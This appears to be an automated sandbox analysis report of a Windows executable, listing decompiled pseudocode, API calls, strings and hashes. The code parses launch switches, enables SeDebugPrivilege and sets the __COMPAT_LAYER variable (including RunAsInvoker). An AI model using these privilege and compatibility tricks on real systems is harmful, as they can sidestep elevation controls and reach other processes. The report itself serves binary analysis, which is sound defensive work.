                                                                                                  							E00401D1E(_t311);
                                                                                                  							L37:
                                                                                                  							if(_t315[0x2660] == _t286) {
                                                                                                  								__eflags = _t315[0x2662] - _t286;
                                                                                                  								if(_t315[0x2662] == _t286) {
                                                                                                  									__eflags = _t315[0x2664] - _t286;
                                                                                                  									if(_t315[0x2664] == _t286) {
                                                                                                  										__eflags = _t315[0x2666] - _t286;
                                                                                                  										if(_t315[0x2666] == _t286) {
                                                                                                  											L46:
                                                                                                  											_t178 = _t315[0x2a6e];
                                                                                                  											_t358 = _t178 - 3;
                                                                                                  											if(_t178 != 3) {
                                                                                                  												__eflags = _t178 - 2;
                                                                                                  												if(_t178 != 2) {
                                                                                                  													__eflags =  *_t311 - _t286;
                                                                                                  													if( *_t311 == _t286) {
                                                                                                  														_push(_t286);
                                                                                                  													} else {
                                                                                                  														_push(_t311);
                                                                                                  													}
                                                                                                  													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                  													L63:
                                                                                                  													_t293 = _t311;
                                                                                                  													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                  													_t312 = _t184;
                                                                                                  													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                  														_t363 = _t315[0x266c] - _t286;
                                                                                                  														if(_t315[0x266c] != _t286) {
                                                                                                  															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                  															_a4 = _a4 | 0xffffffff;
                                                                                                  															_a8 = _t286;
                                                                                                  															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                  															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                  														}
                                                                                                  													}
                                                                                                  													E004055D1(_t184,  &_v44);
                                                                                                  													return _t312;
                                                                                                  												}
                                                                                                  												E00405497( &_v92);
                                                                                                  												E00405497( &_v228);
                                                                                                  												E0040149F(__eflags,  &_v92);
                                                                                                  												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                  												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                  												_t204 = _a4;
                                                                                                  												__eflags =  *_a4;
                                                                                                  												if(__eflags != 0) {
                                                                                                  													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                  												}
                                                                                                  												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                  												_t207 = _v28;
                                                                                                  												__eflags = _t207;
                                                                                                  												_v16 = 0x40c4e8;
                                                                                                  												if(_t207 != 0) {
                                                                                                  													_v16 = _t207;
                                                                                                  												}
                                                                                                  												_v12 = _v12 | 0x00000400;
                                                                                                  												E004054B9( &_v228);
                                                                                                  												E004054B9( &_v92);
                                                                                                  												_t286 = 0;
                                                                                                  												__eflags = 0;
                                                                                                  												L58:
                                                                                                  												_t315 = _a8;
                                                                                                  												_t311 = _a4;
                                                                                                  												goto L63;
                                                                                                  											}
                                                                                                  											E00405497( &_v92);
                                                                                                  											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                  											_t359 =  *_t311 - _t286;
                                                                                                  											if( *_t311 != _t286) {
                                                                                                  												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                  											}
                                                                                                  											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                  											_t219 = _v28;
                                                                                                  											_v16 = 0x40c4e8;
                                                                                                  											if(_t219 != _t286) {
                                                                                                  												_v16 = _t219;
                                                                                                  											}
                                                                                                  											_v12 = _v12 | 0x00000400;
                                                                                                  											E004054B9( &_v92);
                                                                                                  											goto L58;
                                                                                                  										}
                                                                                                  										_push(L"HIGHDPIAWARE");
                                                                                                  										L45:
                                                                                                  										E00401D1E(_t311);
                                                                                                  										goto L46;
                                                                                                  									}
                                                                                                  									_push(L"DISABLEDWM");
                                                                                                  									goto L45;
                                                                                                  								}
                                                                                                  								_push(L"DISABLETHEMES");
                                                                                                  								goto L45;
                                                                                                  							}
                                                                                                  							_push(L"640X480");
                                                                                                  							goto L45;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                  					L10:
                                                                                                  					_v20 =  &_v1316;
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  			}

































































                                                                                                  0x004022d5
                                                                                                  0x004022dd
                                                                                                  0x004022e7
                                                                                                  0x004022ec
                                                                                                  0x004022f7
                                                                                                  0x004022fa
                                                                                                  0x004022fd
                                                                                                  0x00402300
                                                                                                  0x00402307
                                                                                                  0x0040230d
                                                                                                  0x0040230e
                                                                                                  0x00402318
                                                                                                  0x00402321
                                                                                                  0x00402324
                                                                                                  0x00402327
                                                                                                  0x0040232a
                                                                                                  0x0040232d
                                                                                                  0x00402334
                                                                                                  0x00402337
                                                                                                  0x0040233e
                                                                                                  0x0040234f
                                                                                                  0x00402356
                                                                                                  0x0040235b
                                                                                                  0x0040235e
                                                                                                  0x0040236d
                                                                                                  0x00402374
                                                                                                  0x0040237e
                                                                                                  0x00402395
                                                                                                  0x004023a0
                                                                                                  0x004023a0
                                                                                                  0x004023ac
                                                                                                  0x004023cf
                                                                                                  0x004023d2
                                                                                                  0x004023d9
                                                                                                  0x004023de
                                                                                                  0x004023f6
                                                                                                  0x00402403
                                                                                                  0x00402414
                                                                                                  0x00402419
                                                                                                  0x00402403
                                                                                                  0x0040241a
                                                                                                  0x00402423
                                                                                                  0x00402458
                                                                                                  0x0040245d
                                                                                                  0x00402464
                                                                                                  0x00402467
                                                                                                  0x00402468
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402425
                                                                                                  0x00402428
                                                                                                  0x0040242b
                                                                                                  0x00402433
                                                                                                  0x00402434
                                                                                                  0x00402473
                                                                                                  0x00402473
                                                                                                  0x0040247c
                                                                                                  0x00402481
                                                                                                  0x00402488
                                                                                                  0x00402488
                                                                                                  0x00402495
                                                                                                  0x0040249a
                                                                                                  0x004024b7
                                                                                                  0x004024be
                                                                                                  0x004024cd
                                                                                                  0x004024d1
                                                                                                  0x004024ed
                                                                                                  0x004024f0
                                                                                                  0x00402506
                                                                                                  0x0040250b
                                                                                                  0x00402512
                                                                                                  0x00402518
                                                                                                  0x00402519
                                                                                                  0x0040251e
                                                                                                  0x00402524
                                                                                                  0x00402527
                                                                                                  0x0040252b
                                                                                                  0x00402530
                                                                                                  0x00402531
                                                                                                  0x00402531
                                                                                                  0x0040253d
                                                                                                  0x0040255a
                                                                                                  0x00402561
                                                                                                  0x00402570
                                                                                                  0x00402574
                                                                                                  0x00402590
                                                                                                  0x00402593
                                                                                                  0x004025a9
                                                                                                  0x004025ae
                                                                                                  0x004025b5
                                                                                                  0x004025bb
                                                                                                  0x004025bc
                                                                                                  0x004025c1
                                                                                                  0x004025c7
                                                                                                  0x004025ca
                                                                                                  0x004025cd
                                                                                                  0x004025ce
                                                                                                  0x004025d4
                                                                                                  0x004025d4
                                                                                                  0x004025da
                                                                                                  0x004025e3
                                                                                                  0x004025eb
                                                                                                  0x00402633
                                                                                                  0x004025fb
                                                                                                  0x00402608
                                                                                                  0x0040260f
                                                                                                  0x00402614
                                                                                                  0x00402624
                                                                                                  0x00402630
                                                                                                  0x00402630
                                                                                                  0x0040263a
                                                                                                  0x0040263b
                                                                                                  0x00402646
                                                                                                  0x0040264b
                                                                                                  0x0040264c
                                                                                                  0x0040265a
                                                                                                  0x0040265a
                                                                                                  0x0040265d
                                                                                                  0x00402666
                                                                                                  0x00402668
                                                                                                  0x00402668
                                                                                                  0x00402672
                                                                                                  0x00402675
                                                                                                  0x0040267e
                                                                                                  0x0040267e
                                                                                                  0x00402683
                                                                                                  0x0040268b
                                                                                                  0x0040269e
                                                                                                  0x0040269e
                                                                                                  0x004026a3
                                                                                                  0x004026ac
                                                                                                  0x004026b5
                                                                                                  0x004026b8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004026ba
                                                                                                  0x00000000
                                                                                                  0x004026ae
                                                                                                  0x004026ae
                                                                                                  0x004026bf
                                                                                                  0x004026c1
                                                                                                  0x004026c6
                                                                                                  0x004026cc
                                                                                                  0x004026d5
                                                                                                  0x004026db
                                                                                                  0x004026e4
                                                                                                  0x004026ea
                                                                                                  0x004026f3
                                                                                                  0x004026f9
                                                                                                  0x00402707
                                                                                                  0x00402707
                                                                                                  0x0040270d
                                                                                                  0x00402710
                                                                                                  0x0040276d
                                                                                                  0x00402770
                                                                                                  0x0040280b
                                                                                                  0x0040280e
                                                                                                  0x00402813
                                                                                                  0x00402810
                                                                                                  0x00402810
                                                                                                  0x00402810
                                                                                                  0x00402819
                                                                                                  0x0040281f
                                                                                                  0x00402836
                                                                                                  0x00402841
                                                                                                  0x00402846
                                                                                                  0x0040284a
                                                                                                  0x00402851
                                                                                                  0x00402857
                                                                                                  0x00402860
                                                                                                  0x00402865
                                                                                                  0x00402876
                                                                                                  0x00402879
                                                                                                  0x00402888
                                                                                                  0x00402888
                                                                                                  0x00402857
                                                                                                  0x00402891
                                                                                                  0x0040289c
                                                                                                  0x0040289c
                                                                                                  0x00402779
                                                                                                  0x00402784
                                                                                                  0x0040278d
                                                                                                  0x004027a4
                                                                                                  0x004027b3
                                                                                                  0x004027b8
                                                                                                  0x004027bb
                                                                                                  0x004027bf
                                                                                                  0x004027c6
                                                                                                  0x004027c6
                                                                                                  0x004027d1
                                                                                                  0x004027d6
                                                                                                  0x004027d9
                                                                                                  0x004027db
                                                                                                  0x004027e2
                                                                                                  0x004027e4
                                                                                                  0x004027e4
                                                                                                  0x004027e7
                                                                                                  0x004027f4
                                                                                                  0x004027fc
                                                                                                  0x00402801
                                                                                                  0x00402801
                                                                                                  0x00402803
                                                                                                  0x00402803
                                                                                                  0x00402806
                                                                                                  0x00000000
                                                                                                  0x00402806
                                                                                                  0x00402715
                                                                                                  0x00402729
                                                                                                  0x0040272e
                                                                                                  0x00402731
                                                                                                  0x00402738
                                                                                                  0x00402738
                                                                                                  0x00402743
                                                                                                  0x00402748
                                                                                                  0x0040274d
                                                                                                  0x00402754
                                                                                                  0x00402756
                                                                                                  0x00402756
                                                                                                  0x00402759
                                                                                                  0x00402763
                                                                                                  0x00000000
                                                                                                  0x00402763
                                                                                                  0x004026fb
                                                                                                  0x00402700
                                                                                                  0x00402702
                                                                                                  0x00000000
                                                                                                  0x00402702
                                                                                                  0x004026ec
                                                                                                  0x00000000
                                                                                                  0x004026ec
                                                                                                  0x004026dd
                                                                                                  0x00000000
                                                                                                  0x004026dd
                                                                                                  0x004026ce
                                                                                                  0x00000000
                                                                                                  0x004026ce
                                                                                                  0x004026ac
                                                                                                  0x00402443
                                                                                                  0x0040246a
                                                                                                  0x00402470
                                                                                                  0x00000000
                                                                                                  0x00402470

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00402300
                                                                                                  • memset.MSVCRT ref: 0040233E
                                                                                                  • memset.MSVCRT ref: 00402356
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                  • wcschr.MSVCRT ref: 00402387
                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                                                  • memset.MSVCRT ref: 004023D9
                                                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                                                  • memset.MSVCRT ref: 004024BE
                                                                                                  • memset.MSVCRT ref: 004024D1
                                                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                                                  • memset.MSVCRT ref: 00402561
                                                                                                  • memset.MSVCRT ref: 00402574
                                                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                                                  • memset.MSVCRT ref: 0040260F
                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                                                  • GetProcessAffinityMask.KERNEL32(?,?,000000FF), ref: 00402879
                                                                                                  • SetProcessAffinityMask.KERNEL32(?,000000FF), ref: 00402888
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                                                  • API String ID: 2452314994-435178042
                                                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 89%
                                                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                                                  				char _v0;
                                                                                                  				WCHAR* _v4;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t76;
                                                                                                  				void* _t82;
                                                                                                  				wchar_t* _t85;
                                                                                                  				void* _t86;
                                                                                                  				void* _t87;
                                                                                                  				intOrPtr _t92;
                                                                                                  				wchar_t* _t93;
                                                                                                  				intOrPtr _t95;
                                                                                                  				int _t106;
                                                                                                  				char* _t110;
                                                                                                  				intOrPtr _t115;
                                                                                                  				wchar_t* _t117;
                                                                                                  				intOrPtr _t124;
                                                                                                  				wchar_t* _t125;
                                                                                                  				intOrPtr _t131;
                                                                                                  				wchar_t* _t132;
                                                                                                  				int _t154;
                                                                                                  				int _t156;
                                                                                                  				void* _t159;
                                                                                                  				intOrPtr _t162;
                                                                                                  				void* _t177;
                                                                                                  				void* _t178;
                                                                                                  				void* _t179;
                                                                                                  				intOrPtr _t181;
                                                                                                  				int _t187;
                                                                                                  				intOrPtr _t188;
                                                                                                  				intOrPtr _t190;
                                                                                                  				intOrPtr _t198;
                                                                                                  				signed int _t205;
                                                                                                  				signed int _t206;
                                                                                                  
                                                                                                  				_t179 = __edx;
                                                                                                  				_t158 = __ecx;
                                                                                                  				_t206 = _t205 & 0xfffffff8;
                                                                                                  				E0040B550(0x1ccc, __ecx);
                                                                                                  				_t76 = E0040313D(_t158);
                                                                                                  				if(_t76 != 0) {
                                                                                                  					E0040AC52();
                                                                                                  					SetErrorMode(0x8001); // executed
                                                                                                  					_t156 = 0;
                                                                                                  					 *0x40fa70 = 0x11223344;
                                                                                                  					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                                                  					_t82 = E00405497( &_a8);
                                                                                                  					_a48 = 0x20;
                                                                                                  					_a40 = 0;
                                                                                                  					_a52 = 0;
                                                                                                  					_a44 = 0;
                                                                                                  					_a56 = 0;
                                                                                                  					E004056B5(_t158, __eflags, _t82, _a12); // executed
                                                                                                  					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                                                  					 *_t206 = L"/SpecialRun";
                                                                                                  					_t85 = E0040585C( &_v0);
                                                                                                  					__eflags = _t85;
                                                                                                  					if(_t85 != 0) {
                                                                                                  						L8:
                                                                                                  						_t86 = E0040585C( &_a8, L"/Run");
                                                                                                  						__eflags = _t86 - _t156;
                                                                                                  						if(_t86 < _t156) {
                                                                                                  							_t87 = E0040585C( &_a8, L"/cfg");
                                                                                                  							__eflags = _t87 - _t156;
                                                                                                  							if(_t87 >= _t156) {
                                                                                                  								_t162 =  *0x40fa74; // 0x4101c8
                                                                                                  								_t41 = _t87 + 1; // 0x1
                                                                                                  								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                                                  								_t115 =  *0x40fa74; // 0x4101c8
                                                                                                  								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                                                  								__eflags = _t117;
                                                                                                  								if(_t117 == 0) {
                                                                                                  									_a92 = _t156;
                                                                                                  									memset( &_a94, _t156, 0x208);
                                                                                                  									_a620 = _t156;
                                                                                                  									memset( &_a622, _t156, 0x208);
                                                                                                  									GetCurrentDirectoryW(0x104,  &_a92);
                                                                                                  									_t124 =  *0x40fa74; // 0x4101c8
                                                                                                  									_t125 = _t124 + 0x5504;
                                                                                                  									_v4 = _t125;
                                                                                                  									_t187 = wcslen(_t125);
                                                                                                  									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                                                  									__eflags = _t187 + _t51 - 0x104;
                                                                                                  									if(_t187 + _t51 >= 0x104) {
                                                                                                  										_a620 = _t156;
                                                                                                  									} else {
                                                                                                  										E00404BE4( &_a620,  &_a92, _v4);
                                                                                                  									}
                                                                                                  									_t131 =  *0x40fa74; // 0x4101c8
                                                                                                  									_t132 = _t131 + 0x5504;
                                                                                                  									__eflags = _t132;
                                                                                                  									wcscpy(_t132,  &_a620);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							E00402F31(_t156);
                                                                                                  							_t181 =  *0x40fa74; // 0x4101c8
                                                                                                  							_pop(_t159);
                                                                                                  							_a84 =  &_a8;
                                                                                                  							_a76 = 0x40cb0c;
                                                                                                  							_a88 = _t156;
                                                                                                  							_a80 = _t156;
                                                                                                  							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                                                  							_t92 =  *0x40fa74; // 0x4101c8
                                                                                                  							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                                                  							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                                                  								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                                                  								__eflags = _t93;
                                                                                                  								if(_t93 < 0) {
                                                                                                  									E00406420();
                                                                                                  									__imp__CoInitialize(_t156);
                                                                                                  									_t95 =  *0x40fa74; // 0x4101c8
                                                                                                  									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                                                  									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                                                  									_t198 =  *0x40fa74; // 0x4101c8
                                                                                                  									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                                                  									E00402F31(1);
                                                                                                  									__imp__CoUninitialize();
                                                                                                  								} else {
                                                                                                  									E004065BE(_t159);
                                                                                                  								}
                                                                                                  								goto L7;
                                                                                                  							} else {
                                                                                                  								_t64 = _t92 + 0x10; // 0x4101d8
                                                                                                  								_a7356 = _t156;
                                                                                                  								_a7352 = _t156;
                                                                                                  								_a7340 = _t156;
                                                                                                  								_a7344 = _t156;
                                                                                                  								_a7348 = _t156;
                                                                                                  								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                                                  								_t110 =  &_a5288;
                                                                                                  								L6:
                                                                                                  								E004035FB(_t110);
                                                                                                  								L7:
                                                                                                  								E004054B9( &_v0);
                                                                                                  								E004099D4( &_a32);
                                                                                                  								E004054B9( &_v0);
                                                                                                  								_t106 = _t156;
                                                                                                  								goto L2;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t26 = _t86 + 1; // 0x1
                                                                                                  						_t173 = _t26;
                                                                                                  						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							E00402F31(_t156);
                                                                                                  						} else {
                                                                                                  							E00402FC6(_t173, __eflags, _t138);
                                                                                                  						}
                                                                                                  						_t188 =  *0x40fa74; // 0x4101c8
                                                                                                  						_a68 =  &_a8;
                                                                                                  						_a60 = 0x40cb0c;
                                                                                                  						_a72 = _t156;
                                                                                                  						_a64 = _t156;
                                                                                                  						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                                                  						_t190 =  *0x40fa74; // 0x4101c8
                                                                                                  						_a5280 = _t156;
                                                                                                  						_a5276 = _t156;
                                                                                                  						_a5264 = _t156;
                                                                                                  						_a5268 = _t156;
                                                                                                  						_a5272 = _t156;
                                                                                                  						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                                                  						_t110 =  &_a3212;
                                                                                                  						goto L6;
                                                                                                  					}
                                                                                                  					__eflags = _a56 - 3;
                                                                                                  					if(_a56 != 3) {
                                                                                                  						goto L8;
                                                                                                  					}
                                                                                                  					__eflags = 1;
                                                                                                  					_a3212 = 0;
                                                                                                  					_a3208 = 0;
                                                                                                  					_a3196 = 0;
                                                                                                  					_a3200 = 0;
                                                                                                  					_a3204 = 0;
                                                                                                  					_v4 = 0;
                                                                                                  					_v0 = 0;
                                                                                                  					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                                                  					_t177 = 2;
                                                                                                  					_push(E0040584C( &_v0, _t177));
                                                                                                  					L0040B1F8();
                                                                                                  					_pop(_t178);
                                                                                                  					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
                                                                                                  					_t156 = _t154;
                                                                                                  					_t110 =  &_a1132;
                                                                                                  					goto L6;
                                                                                                  				} else {
                                                                                                  					_t106 = _t76 + 1;
                                                                                                  					L2:
                                                                                                  					return _t106;
                                                                                                  				}
                                                                                                  			}





































                                                                                                  0x00408533
                                                                                                  0x00408533
                                                                                                  0x00408536
                                                                                                  0x0040853e
                                                                                                  0x00408546
                                                                                                  0x0040854d
                                                                                                  0x00408559
                                                                                                  0x00408563
                                                                                                  0x00408569
                                                                                                  0x00408572
                                                                                                  0x00408583
                                                                                                  0x0040858d
                                                                                                  0x00408595
                                                                                                  0x0040859e
                                                                                                  0x004085a2
                                                                                                  0x004085a6
                                                                                                  0x004085aa
                                                                                                  0x004085ae
                                                                                                  0x004085b8
                                                                                                  0x004085c1
                                                                                                  0x004085c8
                                                                                                  0x004085cd
                                                                                                  0x004085cf
                                                                                                  0x0040867f
                                                                                                  0x00408688
                                                                                                  0x0040868d
                                                                                                  0x0040868f
                                                                                                  0x00408730
                                                                                                  0x00408735
                                                                                                  0x00408737
                                                                                                  0x0040873d
                                                                                                  0x00408750
                                                                                                  0x0040875d
                                                                                                  0x00408763
                                                                                                  0x00408770
                                                                                                  0x00408775
                                                                                                  0x00408779
                                                                                                  0x0040878b
                                                                                                  0x00408790
                                                                                                  0x004087a2
                                                                                                  0x004087aa
                                                                                                  0x004087b8
                                                                                                  0x004087be
                                                                                                  0x004087c3
                                                                                                  0x004087c9
                                                                                                  0x004087d2
                                                                                                  0x004087df
                                                                                                  0x004087e3
                                                                                                  0x004087e6
                                                                                                  0x00408801
                                                                                                  0x004087e8
                                                                                                  0x004087f8
                                                                                                  0x004087fe
                                                                                                  0x00408811
                                                                                                  0x00408816
                                                                                                  0x00408816
                                                                                                  0x0040881c
                                                                                                  0x00408822
                                                                                                  0x00408779
                                                                                                  0x00408824
                                                                                                  0x00408829
                                                                                                  0x00408833
                                                                                                  0x00408834
                                                                                                  0x00408840
                                                                                                  0x00408848
                                                                                                  0x0040884c
                                                                                                  0x00408850
                                                                                                  0x00408855
                                                                                                  0x0040885a
                                                                                                  0x00408860
                                                                                                  0x004088ac
                                                                                                  0x004088b1
                                                                                                  0x004088b3
                                                                                                  0x004088bf
                                                                                                  0x004088c5
                                                                                                  0x004088cb
                                                                                                  0x004088da
                                                                                                  0x004088ea
                                                                                                  0x004088ed
                                                                                                  0x004088f8
                                                                                                  0x004088ff
                                                                                                  0x00408905
                                                                                                  0x004088b5
                                                                                                  0x004088b5
                                                                                                  0x004088b5
                                                                                                  0x00000000
                                                                                                  0x00408862
                                                                                                  0x00408862
                                                                                                  0x0040886d
                                                                                                  0x00408874
                                                                                                  0x0040887b
                                                                                                  0x00408882
                                                                                                  0x00408889
                                                                                                  0x00408895
                                                                                                  0x00408897
                                                                                                  0x00408658
                                                                                                  0x00408658
                                                                                                  0x0040865d
                                                                                                  0x00408661
                                                                                                  0x0040866a
                                                                                                  0x00408673
                                                                                                  0x00408678
                                                                                                  0x00000000
                                                                                                  0x00408678
                                                                                                  0x00408860
                                                                                                  0x00408695
                                                                                                  0x00408695
                                                                                                  0x0040869f
                                                                                                  0x004086a2
                                                                                                  0x004086af
                                                                                                  0x004086a4
                                                                                                  0x004086a7
                                                                                                  0x004086a7
                                                                                                  0x004086b4
                                                                                                  0x004086bf
                                                                                                  0x004086cb
                                                                                                  0x004086d3
                                                                                                  0x004086d7
                                                                                                  0x004086db
                                                                                                  0x004086e0
                                                                                                  0x004086f1
                                                                                                  0x004086f8
                                                                                                  0x004086ff
                                                                                                  0x00408706
                                                                                                  0x0040870d
                                                                                                  0x00408719
                                                                                                  0x0040871b
                                                                                                  0x00000000
                                                                                                  0x0040871b
                                                                                                  0x004085d5
                                                                                                  0x004085da
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004085ec
                                                                                                  0x004085ef
                                                                                                  0x004085f6
                                                                                                  0x004085fd
                                                                                                  0x00408604
                                                                                                  0x0040860b
                                                                                                  0x00408612
                                                                                                  0x00408616
                                                                                                  0x00408620
                                                                                                  0x0040862a
                                                                                                  0x00408632
                                                                                                  0x00408633
                                                                                                  0x00408638
                                                                                                  0x0040864a
                                                                                                  0x0040864f
                                                                                                  0x00408651
                                                                                                  0x00000000
                                                                                                  0x0040854f
                                                                                                  0x0040854f
                                                                                                  0x00408550
                                                                                                  0x00408556
                                                                                                  0x00408556

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                  • swscanf.MSVCRT ref: 00408620
                                                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                  • API String ID: 3933224404-3784219877
                                                                                                  • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                  • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
